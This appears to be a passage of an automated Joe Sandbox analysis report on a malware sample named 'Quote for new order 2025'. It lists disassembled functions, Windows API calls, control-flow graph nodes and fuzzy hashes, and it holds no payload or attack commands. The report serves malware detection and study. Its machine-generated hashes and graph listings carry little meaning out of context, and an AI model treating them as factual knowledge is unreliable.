                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0041A0CF,000000FF,00000000,00000000,?,00419CBA,0041A0CF,00000000,?,0041A33C,?,00000000,00000000,?), ref: 00419375
                                                                                                                                                        • free.MSVCRT ref: 0041937C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2605342592-0
                                                                                                                                                        • Opcode ID: e4beb7e75d6b6867dc320311ec8e335ac11e6b54827e84fb66ef34ac5fc0bb4b
                                                                                                                                                        • Instruction ID: ea87104fc79d75f86d2c504ed11776472b4b13713310e55314d530160130750a
                                                                                                                                                        • Opcode Fuzzy Hash: e4beb7e75d6b6867dc320311ec8e335ac11e6b54827e84fb66ef34ac5fc0bb4b
                                                                                                                                                        • Instruction Fuzzy Hash: C2F0376660521E7BD71025A55C40D77779CDB8A679B11073BFD10E21C1ED59DC0016B4
                                                                                                                                                        Function 0040A2DE Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1961120804-0
                                                                                                                                                        • Opcode ID: 0805737b1f039988677200671bcaaa36b03551ad30adce6ee1146d80a995da50
                                                                                                                                                        • Instruction ID: 1861b29a0bf7327a5836ebdd28897080e635c1e607cd20ba3add047366222a10
                                                                                                                                                        • Opcode Fuzzy Hash: 0805737b1f039988677200671bcaaa36b03551ad30adce6ee1146d80a995da50
                                                                                                                                                        • Instruction Fuzzy Hash: 57E0E532505209BAEF017FA2D9068CE3B95EF06379B51483BFC0892041EB3DE561879A

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:9.8%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:233
                                                                                                                                                        Total number of Limit Nodes:36
                                                                                                                                                        execution_graph 39435 6f5f7f1 39437 6f5f821 39435->39437 39436 6f5fc00 WaitMessage 39436->39437 39437->39436 39438 6f5f8ac 39437->39438 39441 6f5fcf8 39437->39441 39445 6f5fd00 PeekMessageW 39437->39445 39442 6f5fcf1 39441->39442 39442->39441 39443 6f5fd00 PeekMessageW 39442->39443 39444 6f5fd77 39443->39444 39444->39437 39446 6f5fd77 39445->39446 39446->39437 39516 97fad0 39517 97fb38 CreateWindowExW 39516->39517 39519 97fbf4 39517->39519 39711 87b7697 39712 87b76a1 39711->39712 39713 87b0338 2 API calls 39712->39713 39714 87b77f6 39712->39714 39713->39714 39520 976d58 39521 976d68 39520->39521 39522 976d79 39521->39522 39525 976db7 39521->39525 39530 976e7f 39521->39530 39526 976df2 39525->39526 39527 976ee9 39526->39527 39535 977011 39526->39535 39539 977020 39526->39539 39527->39522 39531 976e84 39530->39531 39532 976ee9 39531->39532 39533 977011 9 API calls 39531->39533 39534 977020 9 API calls 39531->39534 39532->39522 39533->39532 39534->39532 39536 97702d 39535->39536 39537 977067 39536->39537 39543 976a90 39536->39543 39537->39527 39541 97702d 39539->39541 39540 977067 39540->39527 39541->39540 39542 976a90 9 API calls 39541->39542 39542->39540 39544 976a9b 39543->39544 39546 977d80 39544->39546 39547 977204 39544->39547 39546->39546 39548 97720f 39547->39548 39549 977dfe 39548->39549 39564 97ade2 39548->39564 39575 97adf0 39548->39575 39586 97aef8 39548->39586 39597 97af08 39548->39597 39608 97b168 39548->39608 39617 97b340 39548->39617 39625 97b330 39548->39625 39633 977234 39549->39633 39551 977e18 39638 977244 39551->39638 39554 977e29 39554->39546 39565 97ae28 39564->39565 39566 97af08 4 API calls 39565->39566 39567 97ae7d 39565->39567 39568 97b197 39566->39568 39567->39549 39571 97b397 39568->39571 39574 97b2ea 39568->39574 39656 97a0a4 GetFocus 39568->39656 39570 97b43f 39572 977244 4 API calls 39570->39572 39570->39574 39571->39570 39573 97b43a KiUserCallbackDispatcher 39571->39573 39571->39574 39572->39574 39573->39570 39574->39549 39576 97ae28 39575->39576 39577 97af08 3 API calls 39576->39577 39578 97ae7d 39576->39578 39579 97b197 39577->39579 39578->39549 39582 97b397 39579->39582 39585 97b2ea 39579->39585 39657 97a0a4 GetFocus 39579->39657 39581 97b43f 39583 977244 3 API calls 39581->39583 39581->39585 39582->39581 39584 97b43a KiUserCallbackDispatcher 39582->39584 39582->39585 39583->39585 39584->39581 39585->39549 39587 97af2a 39586->39587 39589 97af90 39586->39589 39588 97af08 4 API calls 39587->39588 39587->39589 39590 97b197 39588->39590 39589->39549 39593 97b397 39590->39593 39596 97b2ea 39590->39596 39658 97a0a4 GetFocus 39590->39658 39592 97b43f 39594 977244 4 API calls 39592->39594 39592->39596 39593->39592 39595 97b43a KiUserCallbackDispatcher 39593->39595 39593->39596 39594->39596 39595->39592 39596->39549 39598 97af2a 39597->39598 39600 97af90 39597->39600 39599 97af08 3 API calls 39598->39599 39598->39600 39601 97b197 39599->39601 39600->39549 39604 97b397 39601->39604 39607 97b2ea 39601->39607 39659 97a0a4 GetFocus 39601->39659 39603 97b43f 39605 977244 3 API calls 39603->39605 39603->39607 39604->39603 39606 97b43a KiUserCallbackDispatcher 39604->39606 39604->39607 39605->39607 39606->39603 39607->39549 39609 97af08 4 API calls 39608->39609 39610 97b197 39608->39610 39609->39610 39613 97b397 39610->39613 39616 97b2ea 39610->39616 39660 97a0a4 GetFocus 39610->39660 39612 97b43f 39614 977244 4 API calls 39612->39614 39612->39616 39613->39612 39615 97b43a KiUserCallbackDispatcher 39613->39615 39613->39616 39614->39616 39615->39612 39616->39549 39618 97b36e 39617->39618 39621 97b397 39618->39621 39624 97b4ab 39618->39624 39661 97a0a4 GetFocus 39618->39661 39620 97b43f 39622 977244 4 API calls 39620->39622 39620->39624 39621->39620 39623 97b43a KiUserCallbackDispatcher 39621->39623 39621->39624 39622->39624 39623->39620 39627 97b36e 39625->39627 39626 97b397 39628 97b43f 39626->39628 39631 97b43a KiUserCallbackDispatcher 39626->39631 39632 97b4ab 39626->39632 39627->39626 39627->39632 39662 97a0a4 GetFocus 39627->39662 39630 977244 4 API calls 39628->39630 39628->39632 39630->39632 39631->39628 39636 97723f 39633->39636 39635 97c88c 39635->39551 39637 97c891 39636->39637 39663 97c198 39636->39663 39637->39551 39639 97724f 39638->39639 39640 97cf4f 39639->39640 39667 97c29c 39639->39667 39642 97adf0 4 API calls 39640->39642 39643 977e1f 39642->39643 39644 97d108 39643->39644 39650 97d120 39643->39650 39646 97d151 39644->39646 39647 97d19e 39644->39647 39645 97d15d 39645->39554 39646->39645 39676 97d488 39646->39676 39679 97d478 39646->39679 39647->39554 39652 97d151 39650->39652 39653 97d19e 39650->39653 39651 97d15d 39651->39554 39652->39651 39654 97d488 GetModuleHandleW 39652->39654 39655 97d478 GetModuleHandleW 39652->39655 39653->39554 39654->39653 39655->39653 39656->39571 39657->39582 39658->39593 39659->39604 39660->39613 39661->39621 39662->39626 39664 97c1a3 39663->39664 39665 977244 4 API calls 39664->39665 39666 97ca75 39664->39666 39665->39666 39666->39635 39668 97c2a7 39667->39668 39669 97d022 39668->39669 39671 97d0c1 39668->39671 39674 97d120 GetModuleHandleW 39668->39674 39675 97d108 GetModuleHandleW 39668->39675 39670 97adf0 4 API calls 39669->39670 39672 97d03f 39670->39672 39671->39640 39672->39671 39673 97c29c 4 API calls 39672->39673 39673->39672 39674->39669 39675->39669 39682 97d4c8 39676->39682 39677 97d492 39677->39647 39680 97d492 39679->39680 39681 97d4c8 GetModuleHandleW 39679->39681 39680->39647 39681->39680 39683 97d50c 39682->39683 39684 97d4e9 39682->39684 39683->39677 39684->39683 39685 97d710 GetModuleHandleW 39684->39685 39686 97d73d 39685->39686 39686->39677 39502 6f80848 DispatchMessageW 39503 6f808b4 39502->39503 39504 87b10c8 39505 87b11f7 39504->39505 39506 87b10f5 39504->39506 39507 87b1115 39506->39507 39508 87b0338 2 API calls 39506->39508 39508->39507 39509 6f50040 39510 6f5008e DrawTextExW 39509->39510 39512 6f500e6 39510->39512 39687 977540 39688 977586 GetCurrentProcess 39687->39688 39690 9775d8 GetCurrentThread 39688->39690 39693 9775d1 39688->39693 39691 977615 GetCurrentProcess 39690->39691 39694 97760e 39690->39694 39692 97764b GetCurrentThreadId 39691->39692 39696 9776a4 39692->39696 39693->39690 39694->39691 39715 6f85f80 DispatchMessageA 39716 6f85fec 39715->39716 39513 87b7842 39514 87b0338 2 API calls 39513->39514 39515 87b7855 39514->39515 39447 87b73e0 39449 87b7419 39447->39449 39448 87b74dd 39449->39448 39451 87b0338 39449->39451 39452 87b0343 39451->39452 39453 87b1257 39452->39453 39456 87b8ed0 39452->39456 39461 87b8ec0 39452->39461 39458 87b8ef2 39456->39458 39457 87b8f62 39457->39453 39458->39457 39466 87b9739 39458->39466 39471 87b9800 39458->39471 39462 87b8ed0 39461->39462 39463 87b8f62 39462->39463 39464 87b9739 2 API calls 39462->39464 39465 87b9800 2 API calls 39462->39465 39463->39453 39464->39463 39465->39463 39467 87b975b 39466->39467 39468 87b975f 39467->39468 39470 87b9800 2 API calls 39467->39470 39468->39457 39469 87b978c 39469->39457 39470->39469 39472 87b9805 39471->39472 39476 87b9821 39472->39476 39481 87b9830 39472->39481 39473 87b981c 39473->39457 39477 87b9830 39476->39477 39478 87b99b8 39477->39478 39486 6f50449 39477->39486 39490 6f50458 39477->39490 39478->39473 39482 87b9866 39481->39482 39483 87b99b8 39482->39483 39484 6f50449 GetSysColorBrush 39482->39484 39485 6f50458 GetSysColorBrush 39482->39485 39483->39473 39484->39483 39485->39483 39487 6f50458 39486->39487 39488 6f5087b 39487->39488 39489 6f508be GetSysColorBrush 39487->39489 39488->39478 39489->39488 39491 6f504d6 39490->39491 39492 6f5087b 39491->39492 39493 6f508be GetSysColorBrush 39491->39493 39492->39478 39493->39492 39494 6f5ed68 39495 6f5ed8f 39494->39495 39498 6f5d384 39495->39498 39499 6f5d38f 39498->39499 39500 6f5ef9f GetCurrentThreadId 39499->39500 39501 6f5edb3 39499->39501 39500->39501 39697 6f5f12b 39698 6f5f13e 39697->39698 39702 6f5f340 39698->39702 39705 6f5f368 PostMessageW 39698->39705 39699 6f5f161 39703 6f5f368 PostMessageW 39702->39703 39704 6f5f3d4 39703->39704 39704->39699 39706 6f5f3d4 39705->39706 39706->39699 39707 977848 39708 977809 DuplicateHandle 39707->39708 39710 97784b 39707->39710 39709 97781e 39708->39709

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 06F50458 Relevance: 2.0, APIs: 1, Instructions: 514COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2722 6f50458-6f504e2 call 6f50cf1 2725 6f50544-6f50555 2722->2725 2726 6f504e4-6f5053e call 6f515b7 2722->2726 2730 6f50557-6f505c6 call 6f52791 2725->2730 2731 6f505ce-6f5061e 2725->2731 2726->2725 2737 6f505cc 2730->2737 2738 6f50626-6f5064f 2731->2738 2737->2738 2741 6f50656-6f50658 2738->2741 2742 6f50ab6-6f50ac9 2741->2742 2743 6f5065e-6f50666 2741->2743 2753 6f50c42-6f50c66 2742->2753 2754 6f50acf-6f50ad6 2742->2754 2744 6f5066c-6f50673 2743->2744 2745 6f5072a 2743->2745 2748 6f50675-6f5067a 2744->2748 2749 6f5067c-6f50683 2744->2749 2747 6f5072c-6f50736 2745->2747 2755 6f50751-6f507a5 2747->2755 2756 6f50738-6f5074f 2747->2756 2750 6f5069c-6f5069e 2748->2750 2751 6f50685-6f50687 2749->2751 2752 6f50689-6f50699 2749->2752 2757 6f506a4-6f506ab 2750->2757 2758 6f50726 2750->2758 2751->2750 2752->2750 2754->2753 2765 6f50adc-6f50c37 2754->2765 2760 6f507a6-6f507cc 2755->2760 2756->2760 2768 6f50722 2757->2768 2769 6f506ad-6f506b4 2757->2769 2761 6f50728 2758->2761 2770 6f507d2-6f507dc 2760->2770 2771 6f50959-6f5095b 2760->2771 2761->2747 2765->2753 2772 6f50724 2768->2772 2782 6f506b6-6f506c0 2769->2782 2783 6f506c2 2769->2783 2775 6f507de-6f507e7 2770->2775 2776 6f507e9 2770->2776 2771->2742 2773 6f50961-6f50977 2771->2773 2772->2761 2773->2742 2785 6f5097d-6f50996 2773->2785 2778 6f507eb-6f507ed 2775->2778 2776->2778 2778->2771 2779 6f507f3-6f507fc 2778->2779 2779->2771 2790 6f50802-6f50830 2779->2790 2784 6f506c4-6f506c6 2782->2784 2783->2784 2784->2768 2786 6f506c8-6f506db 2784->2786 2795 6f509bd-6f50aa5 2785->2795 2796 6f50998-6f509b6 2785->2796 2798 6f506dd-6f506ef 2786->2798 2799 6f5071b-6f50720 2786->2799 2793 6f50832-6f5083b 2790->2793 2794 6f5083d 2790->2794 2800 6f5083f-6f50879 2793->2800 2794->2800 2827 6f50aa7 2795->2827 2828 6f50ab3 2795->2828 2796->2795 2798->2799 2809 6f506f1-6f50703 2798->2809 2799->2772 2803 6f5089d-6f508ff GetSysColorBrush 2800->2803 2804 6f5087b-6f5089b 2800->2804 2813 6f50901-6f50907 2803->2813 2814 6f50908-6f50912 2803->2814 2812 6f50914-6f50954 2804->2812 2819 6f50705-6f50715 2809->2819 2820 6f50717-6f50719 2809->2820 2812->2771 2813->2814 2814->2812 2819->2772 2820->2772 2827->2828 2828->2742
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColorBrush.USER32(00000000), ref: 06F508E8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BrushColor
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 464657469-0
                                                                                                                                                        • Opcode ID: bcfec86c9ede9b3553a3e22c75b7d6a14323a7d276499f8dca68046456f88cc3
                                                                                                                                                        • Instruction ID: 99ba094604bae981ee6690793c9fd86fce4b7860ac028ad342ce0abb6aa6070e
                                                                                                                                                        • Opcode Fuzzy Hash: bcfec86c9ede9b3553a3e22c75b7d6a14323a7d276499f8dca68046456f88cc3
                                                                                                                                                        • Instruction Fuzzy Hash: 7932363590061ACFDB61DF64C944BD9B7B2BF89300F1585E9E909AB261EB70EE85CF40
                                                                                                                                                        Function 06F5F7F1 Relevance: 1.8, APIs: 1, Instructions: 329COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 2942 6f5f7f1-6f5f828 2944 6f5f82e-6f5f842 2942->2944 2945 6f5fc59 2942->2945 2946 6f5f844-6f5f86e 2944->2946 2947 6f5f871-6f5f890 2944->2947 2948 6f5fc5e-6f5fc74 2945->2948 2946->2947 2954 6f5f892-6f5f898 2947->2954 2955 6f5f8a8-6f5f8aa 2947->2955 2957 6f5f89c-6f5f89e 2954->2957 2958 6f5f89a 2954->2958 2959 6f5f8ac-6f5f8c4 2955->2959 2960 6f5f8c9-6f5f8d2 2955->2960 2957->2955 2958->2955 2959->2948 2961 6f5f8da-6f5f8e1 2960->2961 2962 6f5f8e3-6f5f8e9 2961->2962 2963 6f5f8eb-6f5f8f2 2961->2963 2964 6f5f8ff-6f5f913 2962->2964 2965 6f5f8f4-6f5f8fa 2963->2965 2966 6f5f8fc 2963->2966 3042 6f5f915 call 6f5fd00 2964->3042 3043 6f5f915 call 6f5fcf8 2964->3043 2965->2964 2966->2964 2967 6f5f91a-6f5f91c 2968 6f5fa71-6f5fa75 2967->2968 2969 6f5f922-6f5f929 2967->2969 2970 6f5fc44-6f5fc57 2968->2970 2971 6f5fa7b-6f5fa7f 2968->2971 2969->2945 2972 6f5f92f-6f5f96c 2969->2972 2970->2948 2973 6f5fa81-6f5fa94 2971->2973 2974 6f5fa99-6f5faa2 2971->2974 2980 6f5f972-6f5f977 2972->2980 2981 6f5fc3a-6f5fc3e 2972->2981 2973->2948 2975 6f5faa4-6f5face 2974->2975 2976 6f5fad1-6f5fad8 2974->2976 2975->2976 2978 6f5fb77-6f5fb8c 2976->2978 2979 6f5fade-6f5fae5 2976->2979 2978->2981 2994 6f5fb92-6f5fb94 2978->2994 2983 6f5fb14-6f5fb36 2979->2983 2984 6f5fae7-6f5fb11 2979->2984 2985 6f5f9a9-6f5f9be call 6f5d488 2980->2985 2986 6f5f979-6f5f987 call 6f5d470 2980->2986 2981->2961 2981->2970 2983->2978 3020 6f5fb38-6f5fb42 2983->3020 2984->2983 2992 6f5f9c3-6f5f9c7 2985->2992 2986->2985 2996 6f5f989-6f5f9a7 call 6f5d47c 2986->2996 2997 6f5f9c9-6f5f9db call 6f5d494 2992->2997 2998 6f5fa38-6f5fa45 2992->2998 2999 6f5fb96-6f5fbcf 2994->2999 3000 6f5fbe1-6f5fbfe 2994->3000 2996->2992 3024 6f5f9dd-6f5fa0d 2997->3024 3025 6f5fa1b-6f5fa33 2997->3025 2998->2981 3012 6f5fa4b-6f5fa55 call 6f5d4a4 2998->3012 3015 6f5fbd1-6f5fbd7 2999->3015 3016 6f5fbd8-6f5fbdf 2999->3016 3000->2981 3011 6f5fc00-6f5fc2c WaitMessage 3000->3011 3017 6f5fc33 3011->3017 3018 6f5fc2e 3011->3018 3026 6f5fa64-6f5fa67 call 6f5d4bc 3012->3026 3027 6f5fa57-6f5fa5a call 6f5d4b0 3012->3027 3015->3016 3016->2981 3017->2981 3018->3017 3031 6f5fb44-6f5fb4a 3020->3031 3032 6f5fb5a-6f5fb75 3020->3032 3034 6f5fa14 3024->3034 3035 6f5fa0f 3024->3035 3025->2948 3037 6f5fa6c 3026->3037 3036 6f5fa5f 3027->3036 3038 6f5fb4c 3031->3038 3039 6f5fb4e-6f5fb50 3031->3039 3032->2978 3032->3020 3034->3025 3035->3034 3036->2981 3037->2981 3038->3032 3039->3032 3042->2967 3043->2967
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3540242653.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_6f50000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: af4e356a59ed603ba5d05656fbe561f0617803841c072f2b4cee5dadc8c3a759
                                                                                                                                                        • Instruction ID: 88b26a6520b24656ea0cb41eb40d83e51a053db1b9eedcebcc784d764ee0978f
                                                                                                                                                        • Opcode Fuzzy Hash: af4e356a59ed603ba5d05656fbe561f0617803841c072f2b4cee5dadc8c3a759
                                                                                                                                                        • Instruction Fuzzy Hash: 93D13A30E01209CFDB54DFA9C958BADBBF1BF84314F1681A4D905AB2A5DB70AD45CF81
                                                                                                                                                        Function 00977530 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1506 977530-9775cf GetCurrentProcess 1510 9775d1-9775d7 1506->1510 1511 9775d8-97760c GetCurrentThread 1506->1511 1510->1511 1512 977615-977649 GetCurrentProcess 1511->1512 1513 97760e-977614 1511->1513 1514 977652-97766a 1512->1514 1515 97764b-977651 1512->1515 1513->1512 1519 977673-9776a2 GetCurrentThreadId 1514->1519 1515->1514 1520 9776a4-9776aa 1519->1520 1521 9776ab-97770d 1519->1521 1520->1521
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 009775BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 009775FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00977638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00977691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: bd53e90abb362058778b358d3f4101a51e94aea1903eaaec08c84787f57b6c24
                                                                                                                                                        • Instruction ID: e0e673af6416b178cd07b124600d4d8e41728ca660756bf79e30aeb022836934
                                                                                                                                                        • Opcode Fuzzy Hash: bd53e90abb362058778b358d3f4101a51e94aea1903eaaec08c84787f57b6c24
                                                                                                                                                        • Instruction Fuzzy Hash: DB5154B1901749CFCB14CFA9D548B9EFBF1AB88314F20C4AAE019A7361DB749984CF65
                                                                                                                                                        Function 00977540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1527 977540-9775cf GetCurrentProcess 1531 9775d1-9775d7 1527->1531 1532 9775d8-97760c GetCurrentThread 1527->1532 1531->1532 1533 977615-977649 GetCurrentProcess 1532->1533 1534 97760e-977614 1532->1534 1535 977652-97766a 1533->1535 1536 97764b-977651 1533->1536 1534->1533 1540 977673-9776a2 GetCurrentThreadId 1535->1540 1536->1535 1541 9776a4-9776aa 1540->1541 1542 9776ab-97770d 1540->1542 1541->1542
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 009775BE
                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 009775FB
                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00977638
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00977691
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                        • Opcode ID: 17a4baf7ed5dd203d733999986763e91c203dc07b979c1d2dfc971c6e2990ff3
                                                                                                                                                        • Instruction ID: 2c84ae4c883168da227d103b40f7dc86d3043e2ed380fd90877adcd7ca17b8cf
                                                                                                                                                        • Opcode Fuzzy Hash: 17a4baf7ed5dd203d733999986763e91c203dc07b979c1d2dfc971c6e2990ff3
                                                                                                                                                        • Instruction Fuzzy Hash: C95155B1901709CFDB14CFA9D548B9EFBF1AB88314F20C469E019A7360DB74A984CF65
                                                                                                                                                        Function 0097D4C8 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 3044 97d4c8-97d4e7 3045 97d513-97d517 3044->3045 3046 97d4e9-97d4f6 call 97c374 3044->3046 3047 97d52b-97d56c 3045->3047 3048 97d519-97d523 3045->3048 3053 97d50c 3046->3053 3054 97d4f8 3046->3054 3055 97d56e-97d576 3047->3055 3056 97d579-97d587 3047->3056 3048->3047 3053->3045 3101 97d4fe call 97d761 3054->3101 3102 97d4fe call 97d770 3054->3102 3055->3056 3058 97d5ab-97d5ad 3056->3058 3059 97d589-97d58e 3056->3059 3057 97d504-97d506 3057->3053 3060 97d648-97d708 3057->3060 3061 97d5b0-97d5b7 3058->3061 3062 97d590-97d597 call 97c380 3059->3062 3063 97d599 3059->3063 3094 97d710-97d73b GetModuleHandleW 3060->3094 3095 97d70a-97d70d 3060->3095 3065 97d5c4-97d5cb 3061->3065 3066 97d5b9-97d5c1 3061->3066 3064 97d59b-97d5a9 3062->3064 3063->3064 3064->3061 3069 97d5cd-97d5d5 3065->3069 3070 97d5d8-97d5e1 call 97c390 3065->3070 3066->3065 3069->3070 3075 97d5e3-97d5eb 3070->3075 3076 97d5ee-97d5f3 3070->3076 3075->3076 3077 97d5f5-97d5fc 3076->3077 3078 97d611-97d615 3076->3078 3077->3078 3080 97d5fe-97d60e call 97c148 call 97c3a0 3077->3080 3099 97d618 call 97da41 3078->3099 3100 97d618 call 97da50 3078->3100 3080->3078 3082 97d61b-97d61e 3085 97d641-97d647 3082->3085 3086 97d620-97d63e 3082->3086 3086->3085 3096 97d744-97d758 3094->3096 3097 97d73d-97d743 3094->3097 3095->3094 3097->3096 3099->3082 3100->3082 3101->3057 3102->3057
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0097D72E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4139908857-0
                                                                                                                                                        • Opcode ID: 611a0aa3817b5d6e7216bc0abab7ae8f01c9c810fd813adaf7bb0a013195e190
                                                                                                                                                        • Instruction ID: 9aef3498a277526c26646bb34de6db65968015e48973f58eb0e85116abc3ee88
                                                                                                                                                        • Opcode Fuzzy Hash: 611a0aa3817b5d6e7216bc0abab7ae8f01c9c810fd813adaf7bb0a013195e190
                                                                                                                                                        • Instruction Fuzzy Hash: C88155B1A01B058FD724DF29D44179ABBF5BF88304F108A2DE08AD7B54D775E949CB90
                                                                                                                                                        Function 0097FAD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 3103 97fad0-97fb36 3104 97fb41-97fb48 3103->3104 3105 97fb38-97fb3e 3103->3105 3106 97fb53-97fbf2 CreateWindowExW 3104->3106 3107 97fb4a-97fb50 3104->3107 3105->3104 3109 97fbf4-97fbfa 3106->3109 3110 97fbfb-97fc33 3106->3110 3107->3106 3109->3110 3114 97fc35-97fc38 3110->3114 3115 97fc40 3110->3115 3114->3115
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0097FBE2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.3528861980.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_5_2_970000_Quote for new order 2025.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                        • Opcode ID: e2fd21e672658fad606a11ed8e08673c477ad7d4e19e2efb4d21eb2e5ef7ad10
